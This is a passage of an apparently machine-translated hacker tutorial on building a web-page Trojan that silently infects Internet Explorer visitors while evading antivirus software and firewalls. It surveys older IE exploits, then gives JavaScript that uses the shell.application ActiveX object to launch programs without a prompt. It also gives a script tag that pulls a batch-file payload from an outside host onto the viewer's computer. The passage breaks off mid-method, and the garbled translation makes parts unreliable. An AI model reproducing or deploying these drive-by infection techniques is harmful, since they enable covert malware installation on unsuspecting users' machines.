To create a perfect IE webpage Trojan, we must first develop a perfect standard for us. I personally think that a perfect IE webpage Trojan should have at least four of the following features:
1. Attackers can bypass antivirus software attacks;
2. Network firewall alarms can be avoided;
III. Applicable to most IE versions (including IE5.0, IE5.5, and IE6.0) in most WINDOWS operating systems (including WIN98, WINME, WIN2000, WINXP, and WIN2003 ), it is best to bring down the SP patch;
4. It makes it difficult for viewers to discover the changes in IE, that is, they can be quietly invisible for a long time.
(Note that the above four points only refer to the webpage, but do not include your Trojan program. That is to say, our webpage Trojan is only responsible for running the specified Trojan program, as for the quality of your Trojan program, only you have to choose it! Don't ask me for it. I won't write it !)
Meet the above four points I want to make your horse more youthful and longer-lasting, faster ......
After reading the above points, are you tempted? Don't worry. Let's start with the shortcomings of the existing Internet web Trojans!
First, the Internet Explorer webpage Trojan, which exploits the old MIME vulnerability, is still popular. However, this vulnerability is too old and applies to fewer Internet Explorer versions, which has a huge impact at the time, patches are almost completed, so the planting success rate of such Trojans is relatively low.
Second: use com. ms. activeX. activeXComponent vulnerability, combined with the IE web Trojan of WSH and FSO controls, although. ms. activeX. the ActiveXComponent vulnerability is widely used in most IE versions. It is a good vulnerability and has a high exploitation value. However, it combines WSH and FSO controls called by popular viruses, although it can avoid network firewall alarms, it can escape the pursuit of anti-virus software (such as Norton ).
Third: the OBJECT Data Remote vulnerability combined with the IE web Trojan of the WSH and FSO controls (typically represented by an animation Shark Web Trojan generator)
The biggest advantage of this Trojan is that it is suitable for many Internet Explorer versions and has newer vulnerabilities, but it has the following shortcomings:
1. In this case, mshta.exe is used to access the network to download the Trojan program, which will cause firewall alarms (such as Skynet firewall );
2. If the IE web Trojan uses the WSH and FSO controls, it will also escape the pursuit of anti-virus software (such as Norton), and the shark Web Trojan uses the WSH and FSO controls, sigh ...... Unfortunately ......?
3. This vulnerability requires web servers to support dynamic web pages, such as ASP, JSP, and CGI, which affects the performance of web servers, after all, the free and stable dynamic web page space is few. Although this vulnerability can also be exploited in the form of mail MIME (see my article on security focus: due to the exploitation of the error MIME vulnerability ...... --- IE Object Data remote execution vulnerability of the use of http://www.xfocus.net/articles/200309/607.html), but the test found that IE6.0 does not work.
If you see the analysis above, do you have this feeling: Qianjun is easy to get, it will be hard to find, Ma er groups, but qianqianma is hard to find! Don't worry. Let me take this together to create the perfect IE webpage Trojan in my heart.
First of all, we need to get rid of anti-virus software, so we cannot use the WSH and FSO controls, because as long as we use the WSH and FSO controls, we will not be able to escape the "Norton" command, how can we do this ?! Don't worry. After my hard work (I was also inspired by the accidental discovery of ASP Trojans), I finally found a usable control, shell. application, which has passed security authentication, can be smoothly executed on the webpage in the "My Computer" domain, it is easier to obtain execution permissions than WSH and FSO (you can exploit cross-origin vulnerabilities). See the following javascript code:
<Script language = "javascript" type = "text/javascript">
Var shell = new ActiveXObject ("shell. application ");
Shell. namespace ("c: \ Windows \"). items (). item ("Notepad.exe"). invokeverb ();
</SCRIPT>
Save it as test.htm and check whether the notepad program is automatically opened. The prompt box indicating whether to allow running is not displayed like WSH and FSO. Is it a bit of interest? Now we can run all programs with known paths, but we need to run our own Trojan program, we also need to download our Trojan program to the viewer's computer and find its location. One by one:
1. Download the Trojan program to the viewer's computer.
There are many solutions to this problem. For example, I mentioned the WINDOWS Help file access protocol to download arbitrary file vulnerabilities (its :), but this time we don't need it. We will teach you two better download methods:
Example 1: using the SCRIPT tag, the code is as follows:
<Script language = "icyfoxlovelace" src = "http://www.godog.y365.com/wodemuma/icyfox.bat"> </SCRIPT>